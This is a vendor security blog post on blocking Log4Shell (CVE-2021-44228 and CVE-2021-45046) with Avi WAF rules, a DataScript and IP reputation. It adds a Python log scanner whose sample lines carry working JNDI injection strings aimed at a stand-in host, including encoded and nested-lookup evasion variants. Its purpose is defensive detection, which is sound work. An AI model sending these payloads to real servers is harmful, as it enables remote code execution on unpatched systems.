Updated December 16, 2021:
- Log4j rules have been updated for precision.
- Manual rules updated.
- CRS-2021-4 released.
- Rules checked for protection against CVE-2021-45046.
- DataScript option has been added.
The Avi Security Team is actively investigating the impact of the Apache Software Foundation log4j remote code execution vulnerability (CVE-2021-44228). Avi is not impacted by this vulnerability. This blog post shows how customers can use Avi to help protect applications against this vulnerability. More details are available in this knowledge base article – https://kb.vmware.com/s/article/87100. In addition, VMware has published a Security Advisory, VMSA-2021-0028, listing all products that are affected along with available workarounds and fixes. The advisory will be updated regularly as new fixes are added.
Since the public release of the vulnerability on December 9th, 2021, and the immediate availability of exploits, we have been analyzing the attack vectors, providing guidance and updates through the VMware support channels, and pushing updates via the Avi Pulse Threat Intel feeds.
Below you can find our recommendations on how to mitigate CVE-2021-44228 and CVE-2021-45046 with your VMware Advanced Load Balancer (Avi).
Since this is an ongoing investigation, we continue to monitor and will update our recommendations accordingly.
As the Avi Platform provides multiple layers of Application Protection, different features can be used and enabled.
All of the proposed features are available to customers subscribed to Avi Pulse Cloud Services without extra charge.
As minimum protection, we recommend using Avi WAF.
Here are the individual steps.
We recommend one of the following:
1. Update to the latest Avi CRS (2021-4) and make sure to enable the new rules 4022060 and 4022061 in Enforcement mode.
(New rules are initially added in Detection mode to avoid false positives, but here we highly recommend moving these rules to Enforcement mode directly.)
Screenshot: New rules in Enforcement mode.
Screenshot: Example attack blocked after the CRS 2021-4 update.
2. If updating Avi CRS is not yet an option, adding the following two PRE CRS (KB) rules will provide the same protection. Again, make sure these rules are in Enforcement mode.
3. Customers that have Application Rules enabled can choose the “apache” Application, which will block the attacks related to this CVE as well. Our recommendation is still to update to the latest CRS as soon as possible.
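To illustrate what the WAF rules and the DataScript are matching on, here is an added example written for this post (it is not Avi's rule content or the DataScript itself): a small Python scanner that runs over access-log lines and flags requests carrying a log4j JNDI lookup. It percent-decodes the line and collapses single-character nested lookups before matching, which is the caveat a practitioner should keep in mind when writing their own signatures: a naive search for the literal string misses encoded or nested variants. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
import urllib.parse

# Single-character nested lookups such as ${lower:j}, ${upper:N} or ${::-j}
# resolve to that character before the outer lookup is evaluated, so the
# detector collapses them the same way before looking for the JNDI prefix.
_NESTED_LOOKUP = re.compile(r"\$\{[^{}]*?:-?([^{}])\}")
# log4j lowercases the lookup key, so the match is case-insensitive.
_JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Percent-decode and collapse nested lookups until the text stops changing.

    The round limit bounds the work done on adversarial input; each round
    handles one layer of URL encoding or lookup nesting.
    """
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        collapsed = _NESTED_LOOKUP.sub(r"\1", decoded)
        if collapsed == text:
            return collapsed
        text = collapsed
    return text


def is_log4shell_probe(text: str) -> bool:
    """True if the text contains a JNDI lookup after normalization."""
    return _JNDI_LOOKUP.search(normalize(text)) is not None


# Constructed Apache-style access log lines (sample data for this example).
# Line 0 is benign; lines 1-3 carry the lookup in the User-Agent, a
# percent-encoded query string, and the Referer with a nested lookup.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.example/a}"',
    '198.51.100.8 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fprobe.example%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.64"',
    '198.51.100.9 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "${${lower:j}ndi:ldap://probe.example/c}" "Mozilla/5.0"',
]


def scan(lines):
    """Return (line_index, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        normalized = normalize(line)
        if _JNDI_LOOKUP.search(normalized):
            hits.append((index, normalized))
    return hits


if __name__ == "__main__":
    for index, normalized in scan(SAMPLE_LOG):
        print(f"line {index}: {normalized}")
```

Running the block prints the three probe lines in their normalized form, which is the form worth keeping in an alert so that an analyst sees the decoded lookup rather than the encoded bytes. The same normalize-then-match approach is what makes a signature robust against the encoding and nesting variants that the CRS 2021-4 rules were tightened for.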
Protection via DataScript
As another method to protect against CVE-2021-44228, we developed a DataScript that blocks the attack vectors.
The DataScript is available in the Avi DataScript Github repository.
It needs to be installed as follows:
During our investigation, we have noticed that many of the IPs that are constantly scanning the internet for vulnerable machines are actually covered by our IP Reputation service. We highly recommend using the included Avi IP Reputation protection to block these known threat actors from accessing your Applications.
Note: As reported, many scans are routed through the Tor network, so blocking these IPs also affects legitimate access to your applications through Tor.
Example of an IP currently blocked through IP Reputation.
LINK KB: How to enable IP Reputation.
If any new attack vectors emerge or variations of the attack are found, we will update this page, KB and Avi Pulse threat intelligence feeds accordingly.
Avi Security Team